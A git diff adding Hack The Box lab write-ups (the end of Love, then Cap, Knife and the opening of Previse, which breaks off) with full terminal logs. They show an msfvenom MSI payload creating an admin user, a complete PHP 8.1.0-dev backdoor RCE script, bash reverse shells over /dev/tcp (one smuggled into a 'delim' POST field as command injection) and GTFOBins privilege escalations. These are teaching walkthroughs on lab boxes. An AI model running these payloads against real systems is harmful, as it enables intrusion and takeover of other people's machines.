+ /home/nothing/HTB/Buff/Invoke-winPEAS.ps1
+ /home/nothing/HTB/Omni/SirepRAT/Invoke-winPEAS.ps1
+ /home/nothing/HTB/Sauna/Invoke-winPEAS.ps1
+ /usr/share/powershell-empire/empire/server/data/module_source/privesc/Invoke-winPEAS.ps1
+
+ [ 10.10.14.34/23 ] [ /dev/pts/12 ] [~/HTB/Love]
+ → cp /home/nothing/HTB/Buff/Invoke-winPEAS.ps1 .
+
+ [ 10.10.14.34/23 ] [ /dev/pts/12 ] [~/HTB/Love]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+ [term2]
+ PS C:\Users\Phoebe> curl http://10.10.14.34:9090/Invoke-winPEAS.ps1 -o peas.ps1
+ PS C:\Users\Phoebe> ls
+
+
+ Directory: C:\Users\Phoebe
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ d-r--- 4/12/2021 3:50 PM 3D Objects
+ d-r--- 4/12/2021 3:50 PM Contacts
+ d-r--- 4/13/2021 3:20 AM Desktop
+ d-r--- 4/12/2021 3:50 PM Documents
+ d-r--- 4/13/2021 9:55 AM Downloads
+ d-r--- 4/12/2021 3:50 PM Favorites
+ d-r--- 4/12/2021 3:50 PM Links
+ d-r--- 4/12/2021 3:50 PM Music
+ d-r--- 4/12/2021 3:52 PM OneDrive
+ d-r--- 4/21/2021 7:01 AM Pictures
+ d-r--- 4/12/2021 3:50 PM Saved Games
+ d-r--- 4/12/2021 3:51 PM Searches
+ d-r--- 4/23/2021 3:39 AM Videos
+ -a---- 8/13/2021 1:24 PM 233056 peas.ps1
+
+
+
+ PS C:\Users\Phoebe> import-module ./peas.ps1
+ PS C:\Users\Phoebe> Invoke-winPEAS
+
+
+` 
+
+Let it run a bit, and then scrolling down we see the following:
+
+
+
+So when these 2 registers are enabled, then users of any privilege can install **.msi** files as **NT AUTHORITY\SYSTEM** , therefore we can simply go to the suggested link to hacktricks.xyz [here](https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated):
+
+
+
+TLDR we're going to generate a malicious **privesc.msi** file using **metasploit** in order to create an account with admin permissions to be able to access the box remotely with admin access:
+
+
+ [term 1]
+ [ 10.10.14.34/23 ] [ /dev/pts/12 ] [~/HTB/Love]
+ → msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi
+ [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
+ [-] No arch selected, selecting arch: x86 from the payload
+ No encoder specified, outputting raw payload
+ Payload size: 284 bytes
+ Final size of msi file: 159744 bytes
+ Saved as: alwe.msi
+
+ [ 10.10.14.34/23 ] [ /dev/pts/12 ] [~/HTB/Love]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+ 10.129.48.103 - - [13/Aug/2021 22:39:22] "GET /alwe.msi HTTP/1.1" 200 -
+
+ [term 2]
+ PS C:\Users\Phoebe> curl http://10.10.14.34:9090/alwe.msi -o privesc.msi
+ PS C:\Users\Phoebe> msiexec /qn /i privesc.msi
+
+ [term 3]
+ [ 10.10.14.34/23 ] [ /dev/pts/15 ] [~/HTB/Love]
+ → evil-winrm -u rottenadmin -p 'P@ssword123!' -i 10.129.48.103
+
+ Evil-WinRM shell v2.4
+
+ Info: Establishing connection to remote endpoint
+
+ *Evil-WinRM* PS C:\Users\rottenadmin\Documents> cd C:\Users\Administrator\Desktop
+ *Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
+ c7XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/62.md b/Easy/62.md
new file mode 100644
index 0000000..c5df149
--- /dev/null
+++ b/Easy/62.md
@@ -0,0 +1,229 @@
+# Cap Writeup
+
+
+
+## Introduction :
+
+Cap is an Easy linux box released back in June 2021.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.66.66.2/32 ] [ /dev/pts/4 ] [~/HTB]
+ → sudo vim /etc/hosts
+ [sudo] password for nothing:
+
+ [ 10.66.66.2/32 ] [ /dev/pts/4 ] [~/HTB]
+ → cat /etc/hosts | tail -n1
+ 10.129.111.61 cap.htb
+
+ [ 10.66.66.2/32 ] [ /dev/pts/4 ] [~/HTB]
+ → nmap -sCV cap.htb
+ Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-28 18:26 CEST
+ Nmap scan report for cap.htb (10.129.111.61)
+ Host is up (0.041s latency).
+ Not shown: 997 closed tcp ports (conn-refused)
+ PORT STATE SERVICE VERSION
+ 21/tcp open ftp vsftpd 3.0.3
+ 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
+ | 256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
+ |_ 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
+ 80/tcp open http gunicorn
+ |_http-server-header: gunicorn
+ |_http-title: Security Dashboard
+ | fingerprint-strings:
+ | FourOhFourRequest:
+ | HTTP/1.0 404 NOT FOUND
+ | Server: gunicorn
+ | Date: Thu, 28 Apr 2022 16:27:05 GMT
+ | Connection: close
+ | Content-Type: text/html; charset=utf-8
+ | Content-Length: 232
+ | <****!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
+ | <****title>404 Not Found
+ | <****h1>Not Found
+
+
+ | <****p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again. <****/p>
+ | GetRequest:
+ | HTTP/1.0 200 OK
+ | Server: gunicorn
+ | Date: Thu, 28 Apr 2022 16:26:59 GMT
+ | Connection: close
+ | Content-Type: text/html; charset=utf-8
+ | Content-Length: 19386
+
+ [...]
+
+ Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 130.33 seconds
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate it:
+
+
+
+So as we can see, the mentionned ip (10.10.14.57) in the pcap file is my IP, and the file is titled 1.pcap. So let's dirbust the website to find other pcap files using gobuster:
+
+
+ [ 10.10.14.57/23 ] [ /dev/pts/31 ] [~/HTB]
+ → gobuster dir -u http://cap.htb/data/ -t 50 -w /usr/share/seclists/Discovery/Web-Content/common.txt -b 302,403,404
+ ===============================================================
+ Gobuster v3.1.0
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
+ ===============================================================
+ [+] Url: http://cap.htb/data/
+ [+] Method: GET
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
+ [+] Negative Status codes: 302,403,404
+ [+] User Agent: gobuster/3.1.0
+ [+] Timeout: 10s
+ ===============================================================
+ 2022/04/28 18:45:14 Starting gobuster in directory enumeration mode
+ ===============================================================
+ /0 (Status: 200) [Size: 17147]
+ /01 (Status: 200) [Size: 17144]
+ /1 (Status: 200) [Size: 17144]
+ /00 (Status: 200) [Size: 17147]
+
+ ===============================================================
+ 2022/04/28 18:45:19 Finished
+ ===============================================================
+
+
+
+Gobuster found the /0 directory so let's go see what is in it:
+
+
+
+going to http://cap.htb/0/ we find the 0.pcap which contains packet information regarding the nathan user's password **Buck3tH4TF0RM3!**. So let's try to login via SSH with his credentials:
+
+
+ [ 10.10.14.57/23 ] [ /dev/pts/31 ] [~/HTB]
+ → ssh nathan@cap.htb
+ The authenticity of host 'cap.htb (10.129.111.61)' can't be established.
+ ED25519 key fingerprint is SHA256:UDhIJpylePItP3qjtVVU+GnSyAZSr+mZKHzRoKcmLUI.
+ This key is not known by any other names
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added 'cap.htb' (ED25519) to the list of known hosts.
+ nathan@cap.htb's password:
+ Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ System information as of Thu Apr 28 16:52:29 UTC 2022
+
+ System load: 0.0
+ Usage of /: 36.7% of 8.73GB
+ Memory usage: 21%
+ Swap usage: 0%
+ Processes: 226
+ Users logged in: 0
+ IPv4 address for eth0: 10.129.111.61
+ IPv6 address for eth0: dead:beef::250:56ff:fe96:4e24
+
+ => There are 2 zombie processes.
+
+ * Super-optimized for small spaces - read how we shrank the memory
+ footprint of MicroK8s to make it the smallest full K8s around.
+
+ https://ubuntu.com/blog/microk8s-memory-optimisation
+
+ 63 updates can be applied immediately.
+ 42 of these updates are standard security updates.
+ To see these additional updates run: apt list --upgradable
+
+
+ The list of available updates is more than a week old.
+ To check for new updates run: sudo apt update
+
+ Last login: Thu May 27 11:21:27 2021 from 10.10.14.7
+ nathan@cap:~$ cat user.txt
+ 54XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And we got the user flag!
+
+## **Part 3 : Getting Root Access**
+
+Now in order to get Root access we need to enumerate the machine, to do that we use linpeas.sh:
+
+
+ [term1]
+ [ 10.10.14.57/23 ] [ /dev/pts/34 ] [~/HTB/Cap]
+ → wget https://github.com/carlospolop/PEASS-ng/releases/download/20220424/linpeas.sh
+ --2022-04-28 19:02:02-- https://github.com/carlospolop/PEASS-ng/releases/download/20220424/linpeas.sh
+ Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
+ Resolving github.com (github.com)... 52.69.186.44
+ Connecting to github.com (github.com)|52.69.186.44|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/081066de-a078-45b2-bfb8-06253be16e3a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential;=AKIAIWNJYAX4CSVEH53A%2F20220428%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date;=20220428T170203Z&X-Amz-Expires;=300&X-Amz-Signature;=1f55ea92c90e5d3e1cdc14915367707f214da89d55934a919e20dbde9ba79ac6&X-Amz-SignedHeaders;=host&actor;_id=0&key;_id=0&repo;_id=165548191&response-content-disposition;=attachment%3B%20filename%3Dlinpeas.sh&response-content-type;=application%2Foctet-stream [following]
+ --2022-04-28 19:02:03-- https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/081066de-a078-45b2-bfb8-06253be16e3a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential;=AKIAIWNJYAX4CSVEH53A%2F20220428%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date;=20220428T170203Z&X-Amz-Expires;=300&X-Amz-Signature;=1f55ea92c90e5d3e1cdc14915367707f214da89d55934a919e20dbde9ba79ac6&X-Amz-SignedHeaders;=host&actor;_id=0&key;_id=0&repo;_id=165548191&response-content-disposition;=attachment%3B%20filename%3Dlinpeas.sh&response-content-type;=application%2Foctet-stream
+ Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.108.133, 185.199.111.133, 185.199.110.133, ...
+ Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.108.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 776167 (758K) [application/octet-stream]
+ Saving to: ‘linpeas.sh’
+
+ linpeas.sh 100%[===========================================================================================================================>] 757.98K 3.67MB/s in 0.2s
+
+ 2022-04-28 19:02:04 (3.67 MB/s) - ‘linpeas.sh’ saved [776167/776167]
+
+
+ [ 10.10.14.57/23 ] [ /dev/pts/34 ] [~/HTB/Cap]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+ 10.129.111.61 - - [28/Apr/2022 19:02:24] "GET /linpeas.sh HTTP/1.1" 200 -
+
+ [term2]
+ nathan@cap:~$ which wget curl
+ /usr/bin/wget
+ /usr/bin/curl
+ nathan@cap:~$ wget http://10.10.14.57:9090/linpeas.sh -O /tmp/linpeas.sh
+ --2022-04-28 17:02:24-- http://10.10.14.57:9090/linpeas.sh
+ Connecting to 10.10.14.57:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 776167 (758K) [application/x-sh]
+ Saving to: ‘/tmp/linpeas.sh’
+
+ /tmp/linpeas.sh 100%[===========================================================================================================================>] 757.98K 1.87MB/s in 0.4s
+
+ 2022-04-28 17:02:24 (1.87 MB/s) - ‘/tmp/linpeas.sh’ saved [776167/776167]
+
+ nathan@cap:~$ chmod +x /tmp/linpeas.sh
+ nathan@cap:~$ /tmp/linpeas.sh
+
+
+
+`  
+
+Now looking at the output of linpeas.sh we see that the cap_setuid capability has been enabled on the python3.8 binary. Which means that the user can run this binary as the root user. So we simply use python's [gtfobin](https://gtfobins.github.io/gtfobins/python/#capabilities):
+
+
+ nathan@cap:~$ /usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/sh")'
+ # id
+ uid=0(root) gid=1001(nathan) groups=1001(nathan)
+ # cat /root/root.txt
+ bfXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to escalate our privileges to the root user and get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/63.md b/Easy/63.md
new file mode 100644
index 0000000..4999814
--- /dev/null
+++ b/Easy/63.md
@@ -0,0 +1,269 @@
+# Knife Writeup
+
+
+
+## Introduction :
+
+Knife is an easy Linux box released back in May 2021.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.57/23 ] [ /dev/pts/0 ] [~/HTB]
+ → sudo vim /etc/hosts
+ [sudo] password for nothing:
+
+ [ 10.10.14.57/23 ] [ /dev/pts/0 ] [~/HTB]
+ → cat /etc/hosts | tail -n1
+ 10.129.111.84 knife.htb
+
+ [ 10.10.14.57/23 ] [ /dev/pts/0 ] [~/HTB]
+ → nmap -sCV knife.htb
+ Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-28 21:44 CEST
+ Nmap scan report for knife.htb (10.129.111.84)
+ Host is up (0.039s latency).
+ Not shown: 998 closed tcp ports (conn-refused)
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
+ | 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
+ |_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
+ 80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
+ |_http-title: Emergent Medical Idea
+ |_http-server-header: Apache/2.4.41 (Ubuntu)
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 10.82 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate it:
+
+
+
+Here we see that the website is running PHP 8.1.0 so let's look for available exploits:
+
+
+ [ 10.66.66.2/32 ] [ /dev/pts/1 ] [~]
+ → searchsploit php 8.1.0
+ PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution | php/webapps/49933.py
+
+ [ 10.66.66.2/32 ] [ /dev/pts/1 ] [~/HTB/Knife]
+ → cp /usr/share/exploit-database/exploits/php/webapps/49933.py .
+
+ [ 10.66.66.2/32 ] [ /dev/pts/1 ] [~/HTB/Knife]
+ → vim 49933.py
+
+ [ 10.66.66.2/32 ] [ /dev/pts/1 ] [~/HTB/Knife]
+ → cat 49933.py
+ # Exploit Title: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
+ # Date: 23 may 2021
+ # Exploit Author: flast101
+ # Vendor Homepage: https://www.php.net/
+ # Software Link:
+ # - https://hub.docker.com/r/phpdaily/php
+ # - https://github.com/phpdaily/php
+ # Version: 8.1.0-dev
+ # Tested on: Ubuntu 20.04
+ # References:
+ # - https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
+ # - https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md
+
+ """
+ Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
+ Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/backdoor_php_8.1.0-dev.py
+ Contact: flast101.sec@gmail.com
+
+ An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.
+ The following exploit uses the backdoor to provide a pseudo shell ont the host.
+ """
+
+ #!/usr/bin/env python3
+ import os
+ import re
+ import requests
+
+ host = input("Enter the full host url:\n")
+ request = requests.Session()
+ response = request.get(host)
+
+ if str(response) == '<****Response [200]>':
+ print("\nInteractive shell is opened on", host, "\nCan't acces tty; job crontol turned off.")
+ try:
+ while 1:
+ cmd = input("$ ")
+ headers = {
+ "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
+ "User-Agentt": "zerodiumsystem('" + cmd + "');"
+ }
+ response = request.get(host, headers = headers, allow_redirects = False)
+ current_page = response.text
+ stdout = current_page.split(' <****!DOCTYPE html>',1)
+ text = print(stdout[0])
+ except KeyboardInterrupt:
+ print("Exiting...")
+ exit
+
+ else:
+ print("\r")
+ print(response)
+ print("Host is not available, aborting...")
+ exit
+
+Now let's try that exploit:
+
+
+ [ 10.66.66.2/32 ] [ /dev/pts/1 ] [~/HTB/Knife]
+ → python3 49933.py
+ Enter the full host url:
+ http://knife.htb
+
+ Interactive shell is opened on http://knife.htb
+ Can't acces tty; job crontol turned off.
+ $ id
+ uid=1000(james) gid=1000(james) groups=1000(james)
+
+
+
+And we got a shell as the james user! Now let's upgrade our shell to a fully interactive TTY:
+
+
+ [term1]
+ [ 10.10.14.68/23 ] [ /dev/pts/15 ] [~/HTB/Knife]
+ → nc -lvnp 9001
+
+ [term2]
+ $ bash -c "bash -i >& /dev/tcp/10.10.14.68/9001 0>&1"
+
+ [term1]
+ [ 10.10.14.68/23 ] [ /dev/pts/15 ] [~/HTB/Knife]
+ → nc -lvnp 9001
+ Connection from 10.129.111.84:45348
+ bash: cannot set terminal process group (893): Inappropriate ioctl for device
+ bash: no job control in this shell
+
+ james@knife:/$ python3 -c 'import pty; pty.spawn("/bin/bash")'
+ python3 -c 'import pty; pty.spawn("/bin/bash")'
+
+ james@knife:/$ ^Z
+ [1] + 269384 suspended nc -lvnp 9001
+
+ [ 10.10.14.68/23 ] [ /dev/pts/15 ] [~/HTB/Knife]
+ → stty raw -echo ; fg
+ [1] + 269384 continued nc -lvnp 9001
+
+ james@knife:/$ export TERM=screen-256color
+ james@knife:/$ export SHELL=bash
+ james@knife:/$ stty rows 40 columns 125
+ james@knife:/$ reset
+
+
+
+Now with this we have a fully interactive shell to work with. Let's grab the user flag:
+
+
+ james@knife:/$ cd ~
+ james@knife:~$ pwd
+ /home/james
+ james@knife:~$ cat user.txt
+ b6XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+## **Part 3 : Getting Root Access**
+
+Now in order to escalate privileges let's run linpeas.sh on the target machine:
+
+
+ [term1]
+ [ 10.10.14.68/23 ] [ /dev/pts/14 ] [~/HTB/Knife]
+ → cp /home/nothing/HTB/Cap/linpeas.sh .
+
+ [ 10.10.14.68/23 ] [ /dev/pts/14 ] [~/HTB/Knife]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+ 10.129.111.84 - - [29/Apr/2022 21:15:53] "GET /linpeas.sh HTTP/1.1" 200 -
+
+ [term2]
+ james@knife:~$ wget http://10.10.14.68:9090/linpeas.sh -O /tmp/peas.sh
+ --2022-04-29 19:15:45-- http://10.10.14.68:9090/linpeas.sh
+ Connecting to 10.10.14.68:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 776167 (758K) [application/x-sh]
+ Saving to: ‘/tmp/peas.sh’
+
+ 2022-04-29 19:15:46 (1.05 MB/s) - ‘/tmp/peas.sh’ saved [776167/776167]
+
+ james@knife:~$ chmod +x /tmp/peas.sh
+ james@knife:~$ /tmp/peas.sh
+
+
+
+` 
+
+Looking at the output we see the following:
+
+
+
+Here we have the knife binary file which can be ran as root by the user james without any password, so let's see what it does:
+
+
+ james@knife:~$ /usr/bin/knife --help
+ Chef Infra Client: 16.10.8
+
+ Docs: https://docs.chef.io/workstation/knife/
+ Patents: https://www.chef.io/patents
+
+ Usage: knife sub-command (options)
+ -s, --server-url URL Chef Infra Server URL.
+ --chef-zero-host HOST Host to start Chef Infra Zero on.
+ --chef-zero-port PORT Port (or port range) to start Chef Infra Zero on. Port ranges like 1000,1010 or 8889-9999 will try all given ports until one works.
+ -k, --key KEY Chef Infra Server API client key.
+ --[no-]color Use colored output, defaults to enabled.
+ -c, --config CONFIG The configuration file to use.
+ --config-option OPTION=VALUE Override a single configuration option.
+ --defaults Accept default values for all questions.
+ -d, --disable-editing Do not open EDITOR, just accept the data as is.
+ -e, --editor EDITOR Set the editor to use for interactive commands.
+ -E, --environment ENVIRONMENT Set the Chef Infra Client environment (except for in searches, where this will be flagrantly ignored).
+ --[no-]fips Enable FIPS mode.
+ -F, --format FORMAT Which format to use for output. (valid options: 'summary', 'text', 'json', 'yaml', or 'pp')
+ --[no-]listen Whether a local mode (-z) server binds to a port.
+ -z, --local-mode Point knife commands at local repository instead of Chef Infra Server.
+ -u, --user USER Chef Infra Server API client username.
+ --print-after Show the data after a destructive operation.
+ --profile PROFILE The credentials profile to select.
+ -V, --verbose More verbose output. Use twice (-VV) for additional verbosity and three times (-VVV) for maximum verbosity.
+ -v, --version Show Chef Infra Client version.
+ -y, --yes Say yes to all prompts for confirmation.
+ -h, --help Show this help message.
+
+ Available subcommands: (for details, knife SUB-COMMAND --help)
+
+
+
+According to the documentation, this [knife](https://docs.chef.io/workstation/knife/) binary is a command-line tool that provides an interface between a local chef-repo and the Chef Infra Server. And it has a [gtfobin](https://gtfobins.github.io/gtfobins/knife/#sudo):
+
+
+ james@knife:~$ sudo knife exec -E 'exec "/bin/sh"'
+ # id
+ uid=0(root) gid=0(root) groups=0(root)
+ # cat /root/root.txt
+ a1XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to get the root flag!
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/64.md b/Easy/64.md
new file mode 100644
index 0000000..0265ea3
--- /dev/null
+++ b/Easy/64.md
@@ -0,0 +1,624 @@
+# Previse Writeup
+
+
+
+## Introduction :
+
+Previse is an easy Linux box released back in August 2021.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.66.66.2/32 ] [ /dev/pts/4 ] [~/HTB]
+ → sudo vim /etc/hosts
+ [sudo] password for nothing:
+
+ [ 10.66.66.2/32 ] [ /dev/pts/4 ] [~/HTB]
+ → cat /etc/hosts | tail -n1
+ 10.129.111.192 previse.htb
+
+ [ 10.66.66.2/32 ] [ /dev/pts/4 ] [~/HTB]
+ → nmap -sCV previse.htb
+ Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-29 21:49 CEST
+ Nmap scan report for previse.htb (10.129.111.192)
+ Host is up (0.037s latency).
+ Not shown: 998 closed tcp ports (conn-refused)
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
+ | 256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
+ |_ 256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
+ 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
+ | http-cookie-flags:
+ | /:
+ | PHPSESSID:
+ |_ httponly flag not set
+ | http-title: Previse Login
+ |_Requested resource was login.php
+ |_http-server-header: Apache/2.4.29 (Ubuntu)
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 8.47 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate it:
+
+
+
+
+ [ 10.66.66.2/32 ] [ /dev/pts/4 ] [~/HTB]
+ → gobuster dir -t 50 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://previse.htb/ -x php,txt,html,css,js,pdf
+ ===============================================================
+ Gobuster v3.1.0
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
+ ===============================================================
+ [+] Url: http://previse.htb/
+ [+] Method: GET
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
+ [+] Negative Status codes: 404
+ [+] User Agent: gobuster/3.1.0
+ [+] Extensions: txt,html,css,js,pdf,php
+ [+] Timeout: 10s
+ ===============================================================
+ 2022/05/01 15:09:49 Starting gobuster in directory enumeration mode
+ ===============================================================
+ /files.php (Status: 302) [Size: 4914] [--> login.php]
+ /header.php (Status: 200) [Size: 980]
+ /nav.php (Status: 200) [Size: 1248]
+ /login.php (Status: 200) [Size: 2224]
+ /download.php (Status: 302) [Size: 0] [--> login.php]
+ /footer.php (Status: 200) [Size: 217]
+ /index.php (Status: 302) [Size: 2801] [--> login.php]
+ /css (Status: 301) [Size: 308] [--> http://previse.htb/css/]
+ /status.php (Status: 302) [Size: 2966] [--> login.php]
+ /js (Status: 301) [Size: 307] [--> http://previse.htb/js/]
+ /logout.php (Status: 302) [Size: 0] [--> login.php]
+ /accounts.php (Status: 302) [Size: 3994] [--> login.php]
+ /config.php (Status: 200) [Size: 0]
+ /logs.php (Status: 302) [Size: 0] [--> login.php]
+
+
+
+Now let's visit **http://previse.htb/accounts.php** and intercept it with burpsuite:
+
+ 
+
+Now here we see something strange, the response we get is a 302 redirection, but the page it is supposed NOT to show gets displayed anyway:
+
+
+
+So instead let's just intercept the request, and and also intercept the response to this request:
+
+  
+
+Then once you click forward, you can create a user:
+
+
+
+Then just login:
+
+
+
+Then we can download the website files:
+
+
+
+Here we see that we can download a backup of the website, but also upload files:
+
+
+
+So first let's downlaod the website backup:
+
+
+ [ 10.66.66.2/32 ] [ /dev/pts/6 ] [~/HTB/Previse]
+ → mv ~/Downloads/siteBackup.zip .
+
+ [ 10.66.66.2/32 ] [ /dev/pts/6 ] [~/HTB/Previse]
+ → mkdir www
+
+ [ 10.66.66.2/32 ] [ /dev/pts/6 ] [~/HTB/Previse]
+ → mv siteBackup.zip www
+
+ [ 10.66.66.2/32 ] [ /dev/pts/6 ] [~/HTB/Previse]
+ → cd www
+
+ [ 10.66.66.2/32 ] [ /dev/pts/6 ] [HTB/Previse/www]
+ → unzip siteBackup.zip
+ Archive: siteBackup.zip
+ inflating: accounts.php
+ inflating: config.php
+ inflating: download.php
+ inflating: file_logs.php
+ inflating: files.php
+ inflating: footer.php
+ inflating: header.php
+ inflating: index.php
+ inflating: login.php
+ inflating: logout.php
+ inflating: logs.php
+ inflating: nav.php
+ inflating: status.php
+
+
+
+Now let's look at those files to see if there is any system-side command that can be ran::
+
+
+ [ 10.66.66.2/32 ] [ /dev/pts/6 ] [HTB/Previse/www]
+ → grep -oP 'exec.*' *
+ logs.php:exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
+
+
+
+And here we see that the logs.php file has a line which runs a python script (log_process.py) that takes the **delim** parameter value as arguement. So let's intercept the POST request to that page:
+
+ 
+
+Here we see that the webpage took approximately 0.5 second to load. Now let's try to see if we have command execution by running the sleep command:
+
+
+
+And here we see that we managed to execute a system command, because we manmaged to make it wait one additional second more. So let's try to get a reverse bash shell:
+
+
+ delim=comma ; bash -c 'bash -i >& /dev/tcp/10.10.14.68/9001 0>&1'
+
+
+
+CTRL+U to url encode it:
+
+
+ delim=comma ; bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.68/9001+0>%261'
+
+
+
+Then send it:
+
+
+
+And we have a reverse shell as www-data! Now let's upgrade our reverse shell to a fully interactive TTY:
+
+
+ [ 10.10.14.68/23 ] [ /dev/pts/22 ] [~]
+ → nc -lvnp 9001
+ Connection from 10.129.95.185:59414
+ bash: cannot set terminal process group (1568): Inappropriate ioctl for device
+ bash: no job control in this shell
+ www-data@previse:/var/www/html$ id
+ id
+ uid=33(www-data) gid=33(www-data) groups=33(www-data)
+ www-data@previse:/var/www/html$ which python python3 curl wget
+ which python python3 curl wget
+ /usr/bin/python
+ /usr/bin/python3
+ /usr/bin/curl
+ /usr/bin/wget
